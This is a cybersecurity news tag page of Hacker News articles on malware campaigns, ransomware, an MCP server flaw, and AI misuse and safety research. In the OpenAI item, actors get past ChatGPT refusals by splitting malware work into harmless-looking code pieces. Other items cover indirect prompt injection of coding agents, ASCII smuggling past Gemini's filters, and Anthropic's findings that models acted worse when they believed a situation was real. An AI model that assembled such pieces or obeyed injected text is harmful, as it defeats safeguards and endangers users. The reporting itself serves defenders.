Tag: Cyber Security

  • Chinese Hackers Weaponize Open-Source Nezha Tool in New Attack Wave

    Chinese Hackers Weaponize Open-Source Nezha Tool in New Attack Wave

    Oct 08, 2025Ravie LakshmananMalware / Threat Intelligence

    Threat actors with suspected ties to China have turned a legitimate open-source monitoring tool called Nezha into an attack weapon, using it to deliver a known malware called Gh0st RAT to targets.

    The activity, observed by cybersecurity company Huntress in August 2025, is characterized by the use of an unusual technique called log poisoning (aka log injection) to plant a web shell on a web server.

    “This allowed the threat actor to control the web server using ANTSWORD, before ultimately deploying Nezha, an operation and monitoring tool that allows commands to be run on a web server,” researchers Jai Minton, James Northey, and Alden Schmidt said in a report shared with The Hacker News.

    DFIR Retainer Services

    In all, the intrusion is said to have likely compromised more than 100 victim machines, with a majority of the infections reported in Taiwan, Japan, South Korea, and Hong Kong.

    The attack chain pieced together by Huntress shows that the attackers, described as a “technically proficient adversary,” leveraged a publicly exposed and vulnerable phpMyAdmin panel to obtain initial access, and then set the language to simplified Chinese.

    The threat actors have been subsequently found to access the server SQL query interface and run various SQL commands in quick succession in order to drop a PHP web shell in a directory accessible over the internet after ensuring that the queries are logged to disk by enabling general query logging.

    “They then issued a query containing their one-liner PHP web shell, causing it to be recorded in the log file,” Huntress explained. “Crucially, they set the log file’s name with a .php extension, allowing it to be executed directly by sending POST requests to the server.”

    The access afforded by the ANTSWORD web shell is then used to run the “whoami” command to determine the privileges of the web server and deliver the open-source Nezha agent, which can be used to remotely commandeer an infected host by connecting to an external server (“c.mid[.]al”).

    An interesting aspect of the attack is that the threat actor behind the operation has been running their Nezha dashboard in Russian, with over 100 victims listed across the world. A smaller concentration of victims is scattered across Singapore, Malaysia, India, the U.K., the U.S., Colombia, Laos, Thailand, Australia, Indonesia, France, Canada, Argentina, Sri Lanka, the Philippines, Ireland, Kenya, and Macao, among others.

    CIS Build Kits

    The Nezha agent enables the next stage of the attack chain, facilitating the execution of an interactive PowerShell script to create Microsoft Defender Antivirus exclusions and launch Gh0st RAT, a malware widely used by Chinese hacking groups. The malware is executed by means of a loader that, in turn, runs a dropper responsible for configuring and starting the main payload.

    “This activity highlights how attackers are increasingly abusing new and emerging publicly available tooling as it becomes available to achieve their goals,” the researchers said.

    “Due to this, it’s a stark reminder that while publicly available tooling can be used for legitimate purposes, it’s also commonly abused by threat actors due to the low research cost, ability to provide plausible deniability compared to bespoke malware, and likelihood of being undetected by security products.”


    Source: thehackernews.com…

  • LockBit, Qilin, and DragonForce Join Forces to Dominate the Ransomware Ecosystem

    LockBit, Qilin, and DragonForce Join Forces to Dominate the Ransomware Ecosystem

    Three prominent ransomware groups DragonForce, LockBit, and Qilin have announced a new strategic ransomware alliance, once underscoring continued shifts in the cyber threat landscape.

    The coalition is seen as an attempt on the part of the financially motivated threat actors to conduct more effective ransomware attacks, ReliaQuest said in a report shared with The Hacker News.

    “Announced shortly after LockBit’s return, the collaboration is expected to facilitate the sharing of techniques, resources, and infrastructure, strengthening each group’s operational capabilities,” the company noted in its ransomware report for Q3 2025.

    “This alliance could help restore LockBit’s reputation among affiliates following last year’s takedown, potentially triggering a surge in attacks on critical infrastructure and expanding the threat to sectors previously considered low risk.”

    DFIR Retainer Services

    The partnership with Qilin is no surprise, given that it has become the most active ransomware group in recent months, claiming a little over 200 victims in Q3 2025 alone.

    “In Q3 2025, Qilin disproportionately targeted North America-based organizations,” ZeroFox said in its Q3 2025 Ransomware Wrap-Up report. “Qilin’s operational tempo began to increase significantly in Q4 2024, when the collective conducted at least 46 attacks.”

    The development coincides with the emergence of LockBit 5.0, which is equipped to target Windows, Linux, and ESXi systems. The latest iteration was first advertised on September 3, 2025, on the RAMP darknet forum on the sixth anniversary of the affiliate program.

    LockBit was dealt a massive blow in early 2024 following a law enforcement operation dubbed Cronos that seized its infrastructure and led to the arrest of some of its members. At its peak, the group is estimated to have targeted over 2,500 victims worldwide and received more than $500 million in ransom payments.

    “If the group manages to rebuild its trust among affiliates, it could reemerge as a dominant ransomware threat, driven by financial motives and by a desire for revenge against law enforcement crackdowns,” ReliaQuest said.

    R&DE incidents by week in Q3 2025

    The return of LockBit and its alliance comes as the threat actor known as Scattered Spider appears to be gearing up to launch its own ransomware-as-a-service (RaaS) program called ShinySp1d3r, making it the first such service by an English-speaking extortion crew.

    ReliaQuest said it’s tracking a total of 81 data leak sites, a significant jump from 51 reported in early 2024. Companies in the professional, scientific, and technical services sector account for the largest number of victims during the time period, surpassing 375.

    Manufacturing, construction, healthcare, finance and insurance, retail, accommodation and food services, education, arts and entertainment, information, and real estate are some of the other commonly affected sectors.

    CIS Build Kits

    Another noteworthy trend is the spike in ransomware attacks targeting countries like Egypt, Thailand, and Colombia, indicating that threat actors are expanding beyond “traditional hotspots” such as Europe and the U.S. to evade law enforcement scrutiny. The vast majority of the victims listed on data leak sites are based in the U.S., Germany, the U.K., Canada, and Italy.

    According to data from ZeroFox, there have been a total of at least 1,429 separate ransomware and digital extortion (R&DE) incidents in Q3 2025, down from 1,961 incidents observed in Q1 2025. Qilin, Akira, INC Ransom, Play, and SafePay have been found to be responsible for approximately 47 percent of all global R&DE attacks in Q2 and Q3 2025.

    “The disproportionate targeting of North America-based entities can be partly attributed to the geopolitical motivations and ideological beliefs of financially motivated threat collectives fueled by opposition to ‘Western’ political and social narratives,” the company said.

    “North America hosts a wide variety of robust industries that comprise substantial and fast-growing digital attack surfaces. The widespread integration of technologies such as cloud networking services and Internet of Things devices contributes to the accessibility of North American assets.”


    Source: thehackernews.com…

  • Severe Figma MCP Vulnerability Lets Hackers Execute Code Remotely — Patch Now

    Severe Figma MCP Vulnerability Lets Hackers Execute Code Remotely — Patch Now

    Oct 08, 2025Ravie LakshmananVulnerability / Software Security

    Figma MCP Vulnerability

    Cybersecurity researchers have disclosed details of a now-patched vulnerability in the popular figma-developer-mcp Model Context Protocol (MCP) server that could allow attackers to achieve code execution.

    The vulnerability, tracked as CVE-2025-53967 (CVSS score: 7.5), is a command injection bug stemming from the unsanitized use of user input, opening the door to a scenario where an attacker can send arbitrary system commands.

    “The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (|, >, &&, etc.),” according to a GitHub advisory for the flaw. “Successful exploitation can lead to remote code execution under the server process’s privileges.”

    Given that the Framelink Figma MCP server exposes various tools to perform operations in Figma using artificial intelligence (AI)-powered coding agents like Cursor, an attacker could trick the MCP client to execute unintended actions by means of an indirect prompt injection.

    DFIR Retainer Services

    Cybersecurity company Imperva, which discovered and reported the problem in July 2025, described CVE-2025-53967 as a “design oversight” in the fallback mechanism that could allow bad actors to achieve full remote code execution, putting developers at risk of data exposure.

    The command injection flaw “occurs during the construction of a command-line instruction used to send traffic to the Figma API endpoint,” security researcher Yohann Sillam said.

    The exploitation sequence takes place over through steps –

    • The MCP client sends an Initialize request to the MCP endpoint to receive an mcp-session-id that’s used in subsequent communication with the MCP server
    • The client sends a JSONRPC request to the MCP server with the method tools/call to call tools like get_figma_data or download_figma_images

    The issue, at its core, resides in “src/utils/fetch-with-retry.ts,” which first attempts to get content using the standard fetch API and, if that fails, proceeds to executing curl command via child_process.exec — which introduces the command injection flaw.

    “Because the curl command is constructed by directly interpolating URL and header values into a shell command string, a malicious actor could craft a specially designed URL or header value that injects arbitrary shell commands,” Imperva said. “This could lead to remote code execution (RCE) on the host machine.”

    In a proof-of-concept attack, a remote bad actor on the same network (e.g., a public Wi-Fi or a compromised corporate device) can trigger the flaw by sending the series of requests to the vulnerable MCP. Alternatively, the attacker could trick a victim into visiting a specially crafted site as part of a DNS rebinding attack.

    The vulnerability has been addressed in version 0.6.3 of figma-developer-mcp, which was released on September 29, 2025. As mitigations, it’s advisable to avoid using child_process.exec with untrusted input and switch to child_process.execFile that eliminates the risk of shell interpretation.

    “As AI-driven development tools continue to evolve and gain adoption, it’s essential that security considerations keep pace with innovation,” the Thales-owned company said. “This vulnerability is a stark reminder that even tools meant to run locally can become powerful entry points for attackers.”

    CIS Build Kits

    The development comes as FireTail revealed that Google has opted not to fix a new ASCII smuggling attack in its Gemini AI chatbot that could be weaponized to craft inputs that can slip through security filters and induce undesirable responses. Other large language models (LLMs) susceptible to this attack are DeepSeek and xAI’s Grok.

    “And this flaw is particularly dangerous when LLMs, like Gemini, are deeply integrated into enterprise platforms like Google Workspace,” the company said. “This technique enables automated identity spoofing and systematic data poisoning, turning a UI flaw into a potential security nightmare.”


    Source: thehackernews.com…

  • Step Into the Password Graveyard… If You Dare (and Join the Live Session)

    Step Into the Password Graveyard… If You Dare (and Join the Live Session)

    Oct 08, 2025The Hacker NewsPassword Security / Cyber Attacks

    Every year, weak passwords lead to millions in losses — and many of those breaches could have been stopped.

    Attackers don’t need advanced tools; they just need one careless login.

    For IT teams, that means endless resets, compliance struggles, and sleepless nights worrying about the next credential leak.

    This Halloween, The Hacker News and Specops Software invite you to a live webinar: “Cybersecurity Nightmares: Tales from the Password Graveyard” — a chilling reality check every IT leader needs.

    You’ll explore real-world password breaches, why traditional password policies fail, and how new tools can help you stop attacks before they happen.

    💀 What You’ll Learn

    • Real breach stories and the lessons behind them.
    • Why complexity alone doesn’t protect your users.
    • How Specops blocks breached passwords in real time.
    • A live demo of creating stronger, compliant, user-friendly policies.
    • A simple three-step plan for IT leaders to eliminate password risks fast.

    👉 Register now to join the live demo and get your action plan.

    🕸️ Make Passwords Secure — and Simple

    Poor password management doesn’t just create risk — it wastes time and hurts productivity. Specops helps IT teams strengthen security without adding friction for users.

    Join this session to learn how to:

    • Cut helpdesk resets.
    • Meet compliance requirements.
    • Stop credential-based attacks for good.

    🎃 Sign up today and end your password nightmares once and for all.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • No Time to Waste: Embedding AI to Cut Noise and Reduce Risk

    No Time to Waste: Embedding AI to Cut Noise and Reduce Risk

    Artificial intelligence is reshaping cybersecurity on both sides of the battlefield. Cybercriminals are using AI-powered tools to accelerate and automate attacks at a scale defenders have never faced before. Security teams are overwhelmed by an explosion of vulnerability data, tool outputs, and alerts, all while operating with finite human resources. The irony is that while AI has become a dominant theme in cybersecurity, many enterprises still struggle to apply it effectively within their programs.

    The problem isn’t access to information, as teams already have more data than they can process. It’s cutting through the noise and focusing on what truly matters. AI is crucial here. Not only can it make security teams more efficient, it can generate insights that would be impossible to gather at scale or in real time without machine assistance. If adversaries are already weaponizing AI, then defenders must embed it into their strategies as well or risk falling further behind in a fight that is moving faster every day.

    Where to Embed AI to Deliver the Most Impact

    To keep pace with adversaries, defenders should focus on these key areas where AI provides the greatest advantage:

    • Deduplication and correlation: Cut through redundant data to create a trusted view of risk.
    • Prioritization: Ensure limited resources are spent on the exposures that matter most.
    • The intelligence layer: Augment human judgment with context, simulations, and recommendations.

    Together, these elements form the foundation of an AI-driven exposure management strategy to enable organizations to reduce risk continuously rather than reactively.

    Security tools are quickly developing AI to enhance decisions and analysis. When evaluating solutions, choose those with proven investment in AI and a clear vision for expansion. PlexTrac, the Pentest Report Automation & Threat Exposure Management platform, introduced AI in 2024 and is actively expanding its use to help teams manage their centralized data across the vulnerability lifecycle.

    Deduplication and Correlation: Creating a Clean Risk Picture

    One of the biggest obstacles security teams face isn’t the absence of tools, but the overload they create. Multiple scanners, asset inventories, and threat feeds often surface the same vulnerabilities again and again. Duplicate findings create noise, slow remediation, and make it nearly impossible to see a clean picture of risk. Analysts often spend more time reconciling conflicting data than actually reducing exposures, especially when findings are scattered across siloed tools instead of centralized in one place where they can be managed together.

    This is where AI can change the game. By normalizing, correlating, and deduplicating millions of records, AI can distill a massive dataset of duplicated vulnerabilities into a single, accurate, and correlated view. This clarity is the foundation for effective risk management. Without it, prioritization is guesswork.

    With centralized data management, platforms like PlexTrac already automate parts of this process, and the next step is applying intelligence to ensure teams can rely on the data in front of them, free from noise, duplication, and distraction.

    Prioritization: Smarter Risk Prioritization

    Once your data is clean, the next challenge is deciding what to fix first. Traditional severity scores, like CVSS, often overwhelm teams with endless lists of “critical” issues. But severity doesn’t always equal risk. AI-driven prioritization blends exploit likelihood, asset exposure, business context, and real-time threat intelligence to surface the exposures that matter and have the highest impact on the business or likeliness of exploitation.

    Instead of spreading resources thin, teams can narrow their focus on the vulnerabilities most likely to be exploited.

    Platforms like PlexTrac have already released contextual risk-based scoring to prioritize remediation using relevant business context and are investing deeply in this intelligence-first prioritization to help organizations align security decisions directly with business outcomes.

    The Intelligence Layer: Augment Human Analysis

    The future of AI in cybersecurity isn’t about replacing analysts, but empowering them. AI can recommend areas of focus, surface potential exploits based on active threats, simulate attack scenarios, and enrich risk scores with live threat data. Analysts still make the calls, but with far more guidance, context, and confidence.

    This “intelligence layer” bridges automation and human judgment to help teams shift from reactive compliance to business-aligned defense.

    Platforms like PlexTrac are building toward this future, where defenders gain an edge not just in efficiency but in foresight.

    Fight Back Against AI: Turn Data Into Defense

    AI-powered deduplication and prioritization are the levers that determine whether organizations stay buried in noise or achieve measurable risk reduction. With adversaries already weaponizing AI, defenders must embed it into their strategies now.

    Done responsibly, AI transforms the flood of security data into actionable insight, allowing teams to cut through chaos, focus resources, and fight back against attackers who are already wielding AI as a weapon.

    As adversaries advance cyberattacks with AI, platforms like PlexTrac are investing heavily in advancing AI-driven capabilities to cut through noise, prioritize what matters, and reduce risk. See it in action by requesting a demo today.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

    OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

    OpenAI on Tuesday said it disrupted three activity clusters for misusing its ChatGPT artificial intelligence (AI) tool to facilitate malware development.

    This includes a Russian‑language threat actor, who is said to have used the chatbot to help develop and refine a remote access trojan (RAT), a credential stealer with an aim to evade detection. The operator also used several ChatGPT accounts to prototype and troubleshoot technical components that enable post‑exploitation and credential theft.

    “These accounts appear to be affiliated with Russian-speaking criminal groups, as we observed them posting evidence of their activities in a Telegram channel dedicated to those actors,” OpenAI said.

    The AI company said while its large language models (LLMs) refused the threat actor’s direct requests to produce malicious content, they worked around the limitation by creating building-block code, which was then assembled to create the workflows.

    Some of the produced output involved code for obfuscation, clipboard monitoring, and basic utilities to exfiltrate data using a Telegram bot. It’s worth pointing out that none of these outputs are inherently malicious on their own.

    “The threat actor made a mix of high‑ and lower‑sophistication requests: many prompts required deep Windows-platform knowledge and iterative debugging, while others automated commodity tasks (such as mass password generation and scripted job applications),” OpenAI added.

    “The operator used a small number of ChatGPT accounts and iterated on the same code across conversations, a pattern consistent with ongoing development rather than occasional testing.”

    The second cluster of activity originated from North Korea and shared overlaps with a campaign detailed by Trellix in August 2025 that targeted diplomatic missions in South Korea using spear-phishing emails to deliver Xeno RAT.

    DFIR Retainer Services

    OpenAI said the cluster used ChatGPT for malware and command-and-control (C2) development, and that the actors engaged in specific efforts such as developing macOS Finder extensions, configuring Windows Server VPNs, or converting Chrome extensions to their Safari equivalents.

    In addition, the threat actors have been found to use the AI chatbot to draft phishing emails, experiment with cloud services and GitHub functions, and explore techniques to facilitate DLL loading, in-memory execution, Windows API hooking, and credential theft.

    The third set of banned accounts, OpenAI noted, shared overlaps with a cluster tracked by Proofpoint under the name UNK_DropPitch (aka UTA0388), a Chinese hacking group which has been attributed to phishing campaigns targeting major investment firms with a focus on the Taiwanese semiconductor industry, with a backdoor dubbed HealthKick (aka GOVERSHELL).

    The accounts used the tool to generate content for phishing campaigns in English, Chinese, and Japanese; assist with tooling to accelerate routine tasks such as remote execution and traffic protection using HTTPS; and search for information related to installing open-source tools like nuclei and fscan. OpenAI described the threat actor as “technically competent but unsophisticated.”

    Outside of these three malicious cyber activities, the company also blocked accounts used for scam and influence operations –

    • Networks likely originating in Cambodia, Myanmar, and Nigeria are abusing ChatGPT as part of likely attempts to defraud people online. These networks used AI to conduct translation, write messages, and to create content for social media to advertise investment scams.
    • Individuals apparently linked to Chinese government entities using ChatGPT to assist in surveilling individuals, including ethnic minority groups like Uyghurs, and analyzing data from Western or Chinese social media platforms. The users asked the tool to generate promotional materials about such tools, but did not use the AI chatbot to implement them.
    • A Russian-origin threat actor linked to Stop News and likely run by a marketing company that used its AI models (and others) to generate content and videos for sharing on social media sites. The generated content criticized the role of France and the U.S. in Africa and Russia’s role on the continent. It also produced English-language content promoting anti-Ukraine narratives.
    • A covert influence operation originating from China, codenamed “Nine—emdash Line” that used its models to generate social media content critical of the Philippines’ President Ferdinand Marcos, as well as create posts about Vietnam’s alleged environmental impact in the South China Sea and political figures and activists involved in Hong Kong’s pro-democracy movement.

    In two different cases, suspected Chinese accounts asked ChatGPT to identify organizers of a petition in Mongolia and funding sources for an X account that criticized the Chinese government. OpenAI said its models returned only publicly available information as responses and did not include any sensitive information.

    “A novel use for this [China-linked influence network was requests for advice on social media growth strategies, including how to start a TikTok challenge and get others to post content about the #MyImmigrantStory hashtag (a widely used hashtag of long standing whose popularity the operation likely strove to leverage),” OpenAI said.

    “They asked our model to ideate, then generate a transcript for a TikTok post, in addition to providing recommendations for background music and pictures to accompany the post.”

    CIS Build Kits

    OpenAI reiterated that its tools provided the threat actors with novel capabilities that they could not otherwise have obtained from multiple publicly available resources online, and that they were used to provide incremental efficiency to their existing workflows.

    But one of the most interesting takeaways from the report is that threat actors are trying to adapt their tactics to remove possible signs that could indicate that the content was generated by an AI tool.

    “One of the scam networks [from Cambodia] we disrupted asked our model to remove the em-dashes (long dash, –) from their output, or appears to have removed the em-dashes manually before publication,” the company said. “For months, em-dashes have been the focus of online discussion as a possible indicator of AI usage: this case suggests that the threat actors were aware of that discussion.”

    The findings from OpenAI come as rival Anthropic released an open-source auditing tool called Petri (short for “Parallel Exploration Tool for Risky Interactions”) to accelerate AI safety research and better understand model behavior across various categories like deception, sycophancy, encouragement of user delusion, cooperation with harmful requests, and self-perseveration.

    “Petri deploys an automated agent to test a target AI system through diverse multi-turn conversations involving simulated users and tools,” Anthropic said.

    “Researchers give Petri a list of seed instructions targeting scenarios and behaviors they want to test. Petri then operates on each seed instruction in parallel. For each seed instruction, an auditor agent makes a plan and interacts with the target model in a tool use loop. At the end, a judge scores each of the resulting transcripts across multiple dimensions so researchers can quickly search and filter for the most interesting transcripts.”


    Source: thehackernews.com…

  • BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers

    BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers

    Oct 07, 2025Ravie LakshmananMalware / Threat Intelligence

    A Vietnamese threat actor named BatShadow has been attributed to a new campaign that leverages social engineering tactics to deceive job seekers and digital marketing professionals to deliver a previously undocumented malware called Vampire Bot.

    “The attackers pose as recruiters, distributing malicious files disguised as job descriptions and corporate documents,” Aryaka Threat Research Labs researchers Aditya K Sood and Varadharajan K said in a report shared with The Hacker News. “When opened, these lures trigger the infection chain of a Go-based malware.”

    The attack chains, per the cybersecurity company, leverage ZIP archives containing decoy PDF documents along with malicious shortcut (LNK) or executable files that are masked as PDF to trick users into opening them. When launched, the LNK file runs an embedded PowerShell script that reaches out to an external server to download a lure document, a PDF for a marketing job at Marriott.

    The PowerShell script also downloads from the same server a ZIP file that includes files related to XtraViewer, a remote desktop connection software, and executes it likely with an aim to establish persistent access to compromised hosts.

    DFIR Retainer Services

    Victims who end up clicking on a link in the lure PDF to supposedly “preview” the job description are directed to another landing page that serves a fake error message stating the browser is unsupported and that “the page only supports downloads on Microsoft Edge.”

    “When the user clicks the OK button, Chrome simultaneously blocks the redirect,” Aryaka said. “The page then displays another message instructing the user to copy the URL and open it in the Edge browser to download the file.”

    The instruction on the part of the attacker to get the victim to use Edge as opposed to, say, Google Chrome or other web browsers is likely down to the fact that scripted pop-ups and redirects are likely blocked by default, whereas manually copying and pasting the URL on Edge allows the infection chain to continue, as it’s treated as a user-initiated action.

    However, should the victim opt to open the page in Edge, the URL is programmatically launched in the web browser, only to display a second error message: “The online PDF viewer is currently experiencing an issue. The file has been compressed and sent to your device.”

    This subsequently triggers the auto-download of a ZIP archive containing the purported job description, including a malicious executable (“Marriott_Marketing_Job_Description.pdf.exe”) that mimics a PDF by padding extra spaces between “.pdf” and “.exe.”

    The executable is a Golang malware dubbed Vampire Bot that can profile the infected host, steal a wide range of information, capture screenshots at configurable intervals, and maintain communication with an attacker-controlled server (“api3.samsungcareers[.]work”) to run commands or fetch additional payloads.

    BatShadow’s links to Vietnam stem from the use of an IP address (103.124.95[.]161) that has been previously flagged as used by hackers with links to the country. Furthermore, digital marketing professionals have been one of the main targets of attacks perpetrated by various Vietnamese financially motivated groups, who have a track record of deploying stealer malware to hijack Facebook business accounts.

    CIS Build Kits

    In October 2024, Cyble also disclosed details of a sophisticated multi-stage attack campaign orchestrated by a Vietnamese threat actor that targeted job seekers and digital marketing professionals with Quasar RAT using phishing emails containing booby-trapped job description files.

    BatShadow is assessed to be active for at least a year, with prior campaigns using similar domains, such as samsung-work.com, to propagate malware families including Agent Tesla, Lumma Stealer, and Venom RAT.

    “The BatShadow threat group continues to employ sophisticated social engineering tactics to target job seekers and digital marketing professionals,” Aryaka said. “By leveraging disguised documents and a multi-stage infection chain, the group delivers a Go-based Vampire Bot capable of system surveillance, data exfiltration, and remote task execution.”


    Source: thehackernews.com…

  • Google's New AI Doesn't Just Find Vulnerabilities — It Rewrites Code to Patch Them

    Google's New AI Doesn't Just Find Vulnerabilities — It Rewrites Code to Patch Them

    Oct 07, 2025Ravie LakshmananArtificial Intelligence / Software Security

    Google’s DeepMind division on Monday announced an artificial intelligence (AI)-powered agent called CodeMender that automatically detects, patches, and rewrites vulnerable code to prevent future exploits.

    The efforts add to the company’s ongoing efforts to improve AI-powered vulnerability discovery, such as Big Sleep and OSS-Fuzz.

    DeepMind said the AI agent is designed to be both reactive and proactive, by fixing new vulnerabilities as soon as they are spotted as well as rewriting and securing existing codebases with an aim to eliminate whole classes of vulnerabilities in the process.

    “By automatically creating and applying high-quality security patches, CodeMender’s AI-powered agent helps developers and maintainers focus on what they do best — building good software,” DeepMind researchers Raluca Ada Popa and Four Flynn said.

    DFIR Retainer Services

    “Over the past six months that we’ve been building CodeMender, we have already upstreamed 72 security fixes to open source projects, including some as large as 4.5 million lines of code.”

    CodeMender, under the hood, leverages Google’s Gemini Deep Think models to debug, flag, and fix security vulnerabilities by addressing the root cause of the problem, and validate them to ensure that they don’t trigger any regressions.

    The AI agent, Google added, also makes use of a large language model (LLM)-based critique tool that highlights the differences between the original and modified code in order to verify that the proposed changes do not introduce regressions, and self-correct as required.

    Google said it also intended to slowly reach out to interested maintainers of critical open-source projects with CodeMender-generated patches, and solicit their feedback, so that the tool can be used to keep codebases secure.

    The development comes as the company said it’s instituting an AI Vulnerability Reward Program (AI VRP) to report AI-related issues in its products, such as prompt injections, jailbreaks, and misalignment, and earn rewards that go as high as $30,000.

    In June 2025, Anthropic revealed that models from various developers resorted to malicious insider behaviors when that was the only way to avoid replacement or achieve their goals, and that LLM models “misbehaved less when it stated it was in testing and misbehaved more when it stated the situation was real.”

    CIS Build Kits

    That said, policy-violating content generation, guardrail bypasses, hallucinations, factual inaccuracies, system prompt extraction, and intellectual property issues do not fall under the ambit of the AI VRP.

    Google, which previously set up a dedicated AI Red Team to tackle threats to AI systems as part of its Secure AI Framework (SAIF), has also introduced a second iteration of the framework to focus on agentic security risks like data disclosure and unintended actions, and the necessary controls to mitigate them.

    The company further noted that it’s committed to using AI to enhance security and safety, and use the technology to give defenders an advantage and counter the growing threat from cybercriminals, scammers, and state-backed attackers.


    Source: thehackernews.com…

  • XWorm 6.0 Returns with 35+ Plugins and Enhanced Data Theft Capabilities

    XWorm 6.0 Returns with 35+ Plugins and Enhanced Data Theft Capabilities

    XWorm 6.0

    Cybersecurity researchers have charted the evolution of XWorm malware, turning it into a versatile tool for supporting a wide range of malicious actions on compromised hosts.

    “XWorm’s modular design is built around a core client and an array of specialized components known as plugins,” Trellix researchers Niranjan Hegde and Sijo Jacob said in an analysis published last week. “These plugins are essentially additional payloads designed to carry out specific harmful actions once the core malware is active.”

    XWorm, first observed in 2022 and linked to a threat actor named EvilCoder, is a Swiss Army knife of malware that can facilitate data theft, keylogging, screen capture, persistence, and even ransomware operations. It’s primarily propagated via phishing emails and bogus sites advertising malicious ScreenConnect installers.

    Some of the other tools advertised by the developer include a .NET-based malware builder, a remote access trojan called XBinder, and a program that can bypass User Account Control (UAC) restrictions on Windows systems. In recent years, the development of XWorm has been led by an online persona called XCoder.

    In a report published last month, Trellix detailed shifting XWorm infection chains that have used Windows shortcut (LNK) files distributed via phishing emails to execute PowerShell commands that drop a harmless TXT file and a deceptive executable masquerading as Discord, which then ultimately launches the malware.

    DFIR Retainer Services

    XWorm incorporates various anti-analysis and anti-evasion mechanisms to check for tell-tale signs of a virtualized environment, and if so, immediately cease its execution. The malware’s modularity means various commands can be issued from an external server to perform actions like shutting down or restarting the system, downloading files, opening URLs, and initiating DDoS attacks.

    “This rapid evolution of XWorm within the threat landscape, and its current prevalence, highlights the critical importance of robust security measures to combat ever-changing threats,” the company noted.

    XWorm’s operations have also witnessed their share of setbacks over the past year, the most important being XCoder’s decision to delete their Telegram account abruptly in the second half of 2024, leaving the future of the tool in limbo. Since then, however, threat actors have been observed distributing a cracked version of XWorm version 5.6 that contained malware to infect other threat actors who may end up downloading it.

    This included attempts made by an unknown threat actor to trick script kiddies into downloading a trojanized version of the XWorm RAT builder via GitHub repositories, file-sharing services, Telegram channels, and YouTube videos to compromise over 18,459 devices globally.

    This has been complemented by attackers distributing modified versions of XWorm – one of which is a Chinese variant codenamed XSPY – as well as the discovery of a remote code execution (RCE) vulnerability in the malware that allows attackers with the command-and-control (C2) encryption key to execute arbitrary code.

    While the apparent abandonment of XWorm by XCoder raised the possibility that the project was “closed for good,” Trellix said it spotted a threat actor named XCoderTools offering XWorm 6.0 on cybercrime forums on Jun 4, 2025, for $500 for lifetime access, describing it as a “fully re-coded” version with fix for the aforementioned RCE flaw. It’s currently not known if the latest version is the work of the same developer or someone else capitalizing on the malware’s reputation.

    Campaigns distributing XWorm 6.0 in the wild have used malicious JavaScript files in phishing emails that, when opened, display a decoy PDF document, while, in the background, PowerShell code is executed to inject the malware into a legitimate Windows process like RegSvcs.exe without raising any attention.

    XWorm V6.0 is designed to connect to its C2 server at 94.159.113[.]64 on port 4411 and supports a command called “plugin” to run more than 35 DLL payloads on the infected host’s memory and carry out various tasks.

    “When the C2 server sends the command ‘plugin,’ it includes the SHA-256 hash of the plugin DLL file and the arguments for its invocation,” Trellix explained. “The client then uses the hash to check if the plugin has been previously received. If the key is not found, the client sends a ‘sendplugin’ command to the C2 server, along with the hash.”

    “The C2 server then responds with the command’savePlugin’ along with a base64 encoded string containing the plugin and SHA-256 hash. Upon receiving and decoding the plugin, the client loads the plugin into the memory.”

    CIS Build Kits

    Some of the supported plugins in XWorm 6.x (6.0, 6.4, and 6.5) are listed below –

    • RemoteDesktop.dll, to create a remote session to interact with the victim’s machine.
    • WindowsUpdate.dll, Stealer.dll, Recovery.dll, merged.dll, Chromium.dll, and SystemCheck.Merged.dll, to steal the victim’s data, such as Windows product keys, Wi-Fi passwords, and stored credentials from web browsers (bypassing Chrome’s app-bound encryption) and other applications like FileZilla, Discord, Telegram, and MetaMask
    • FileManager.dll, to facilitate filesystem access and manipulation capabilities to the operator
    • Shell.dll, to execute system commands sent by the operator in a hidden cmd.exe process.
    • Informations.dll, to gather system information about the victim’s machine.
    • Webcam.dll, to record the victim and to verify if an infected machine is real
    • TCPConnections.dll, ActiveWindows.dll, and StartupManager.dll, to send a list of active TCP connections, active windows, and startup programs, respectively, to the C2 server
    • Ransomware.dll, to encrypt and decrypt files and extort users for a cryptocurrency ransom (shares code overlaps with NoCry ransomware)
    • Rootkit.dll, to install a modified r77 rootkit
    • ResetSurvival.dll, to survive device reset through Windows Registry modifications

    XWorm 6.0 infections, besides dropping custom tools, have also served as a conduit for other malware families such as DarkCloud Stealer, Hworm (VBS-based RAT), Snake KeyLogger, Coin Miner, Pure Malware, ShadowSniff Stealer (open-source Rust stealer), Phantom Stealer, Phemedrone Stealer, and Remcos RAT.

    “Further investigation of the DLL file revealed multiple XWorm V6.0 Builders on VirusTotal that are themselves infected with XWorm malware, suggesting that an XWorm RAT operator has been compromised by XWorm malware!,” Trellix said.

    “The unexpected return of XWorm V6, armed with a versatile array of plugins for everything from keylogging and credential theft to ransomware, serves as a powerful reminder that no malware threat is ever truly gone.”


    Source: thehackernews.com…

  • New Research: AI Is Already the #1 Data Exfiltration Channel in the Enterprise

    New Research: AI Is Already the #1 Data Exfiltration Channel in the Enterprise

    For years, security leaders have treated artificial intelligence as an “emerging” technology, something to keep an eye on but not yet mission-critical. A new Enterprise AI and SaaS Data Security Report by AI & Browser Security company LayerX proves just how outdated that mindset has become. Far from a future concern, AI is already the single largest uncontrolled channel for corporate data exfiltration—bigger than shadow SaaS or unmanaged file sharing.

    The findings, drawn from real-world enterprise browsing telemetry, reveal a counterintuitive truth: the problem with AI in enterprises isn’t tomorrow’s unknowns, it’s today’s everyday workflows. Sensitive data is already flowing into ChatGPT, Claude, and Copilot at staggering rates, mostly through unmanaged accounts and invisible copy/paste channels. Traditional DLP tools—built for sanctioned, file-based environments—aren’t even looking in the right direction.

    From “Emerging” to Essential in Record Time

    In just two years, AI tools have reached adoption levels that took email and online meetings decades to achieve. Almost one in two enterprise employees (45%) already use generative AI tools, with ChatGPT alone hitting 43% penetration. Compared with other SaaS tools, AI accounts for 11% of all enterprise application activity, rivaling file-sharing and office productivity apps.

